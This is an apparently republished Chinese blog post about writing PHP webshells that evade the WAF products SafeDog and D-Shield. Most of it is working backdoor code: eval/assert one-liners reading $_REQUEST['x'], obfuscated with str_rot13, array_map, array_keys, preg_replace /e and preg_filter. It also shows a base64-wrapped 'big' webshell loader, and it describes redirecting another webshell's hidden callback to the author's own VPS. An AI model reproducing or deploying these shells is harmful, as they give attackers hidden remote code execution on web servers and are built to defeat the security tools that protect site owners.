php webshell 小马,php webshell免杀

本文主要是介绍php webshell 小马,php webshell免杀，希望对大家解决编程问题提供一定的参考价值，需要的开发者们随着小编来一起学习吧！

前言

最近在研究php免杀绕过安全狗、D盾等WAF防护软件。也算是小有成绩。故记录下来。

一句话木马

在渗透测试中最常用的就是一句话后门(小马)和中国菜刀的配合。如果出现某种WAF防护，就寻找一个免杀的大马挂马。

最常见的php一句话木马

这个一句话木马由两部分组成，eval用来执行接收的代码。$_POST['x']来接收数值。

本着这个原则，尝试改写一句话木马绕过WAF。

搜集了几个常用的php函数

执行代码的eval、assert、preg_replace

接收数据的$_POST、$_GET、$_REQUEST

php一句话免杀

str_rot13函数

$c=str_rot13('nffreg');

$c($_REQUEST['x']);

str_rot13函数来替代assert。该函数对字符串执行ROT13编码。ROT13编码就是把每个字母在字母表中移动13位。

测试发现无法绕过安全狗。修改一下。

function xiaoma($a){

$c=str_rot13('nffreg');

$c($a);

}

xiaoma($_REQUEST['x']);

即可绕过安全狗。

class One{

function xiaoma($x){

$c=str_rot13('n!ff!re!nffreg');

$str=explode('!',$c)[3];

$str($x);

}

$test=new One();

$test->xiaoma($_REQUEST['x']);

再次修改，加了explode函数分割字符串，class封装类。可绕过D盾。

array_map函数

array_map() 函数将函数作用到数组中的每个值上，并返回一个新的数组。

$a1=array("1234","123456");

$a2=array(@$_REQUEST['x'],"1234");

$a=array_map(null,$a1,$a2)[0][1];

assert($a);

即可绕过安全狗。

array_key函数

array_key() 函数也是返回包含数组的一个新数组。

$a=array($_REQUEST['x']=>"3");

$b=array_keys($a)[0];

eval($b);

索引数组变化为关联数组。

即可绕过安全狗、D盾。

preg_replace函数

用来正则匹配的一个函数。

function func(){

return $_REQUEST['x'];

}

preg_replace("/test/e",func(),"i am test");

/e用来当做php代码解析。5.6版本以下实用。

测试可绕过安全狗和D盾。

preg_filter函数

根据preg_replace修改为preg_filter函数，也是用来执行正则的匹配替换。

$a=preg_filter('/\s+/','','as s er t');

$a($_REQUEST['x']);

也可以绕过D盾、安全狗。

其他

function test($a){

$arr = array('a','s','s','e','r','t');

$func = '';

for($i=0;$i

$func.=$func.$arr[$i];

}

$func=substr($func,-6);

$func($a);

}

test($_REQUEST['x']);

也可以绕过D盾、安全狗。

f374d8b684fe?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

image.png

php免杀大马

正好自己手里有一个php大马。但不免杀。尝试将源码base64加密后修改为php免杀大马。

将大马eval函数变为exit或者echo。burp抓取源代码。

f374d8b684fe?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

image.png

f374d8b684fe?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

image.png

将源代码拷贝下来，审计发现给源码存在一处后门。

f374d8b684fe?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

image.png

base64解码一下

f374d8b684fe?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

image.png

哦！！！真是可以。

将该base64地址修改为自己的vps地址。嘻嘻。

那现在只要eval函数可以执行这传base64的字符串就可以啦。

WAF对base64_encode、base64_decode查杀非常严格。

不断搜索、修改、编写，最终成功。

header("Content-type: text/html; charset=utf-8");

class one{

public function dama(){

$l='base';

$o='64_de';

$v='co';

$e='de';

$love=$l.$o.$v.$e;

$c="love";

$shellname='网站安全检测';

$password='xxx';

$myurl='http://www.xxx.com';

$a=$$c('code');//php源码

@eval($a);

}

$person = new one;

$person->dama();

直接将php大马源码放在code处。即可。

也可以改造php免杀一句话木马。

比如这款

header("Content-type: text/html; charset=utf-8");

function test($code){

$password='xxx';

$a=preg_filter('/\s+/','','base 64 _ deco de');

$c=$a($code);

@eval($c);

}

$code=''; //code存放php大马

test($code);

访问一下。

f374d8b684fe?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

image.png

查看vps是否接收到。

f374d8b684fe?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation

image.png

这篇关于php webshell 小马,php webshell免杀的文章就介绍到这儿，希望我们推荐的文章对编程师们有所帮助！

php webshell 小马,php webshell免杀

相关文章

PHP执行php.exe -v命令报错的解决方案

PHP原理之内存管理中难懂的几个点

php中json_decode()和json_encode()

如何将文件夹里的PHP代码放到一个文件里

PHP抓取网站图片脚本

PHP防止SQL注入详解及防范

PHP防止SQL注入的方法（2）

PHP防止SQL注入的方法（1）

Linux系统安装php开发环境

PHP字符串全排列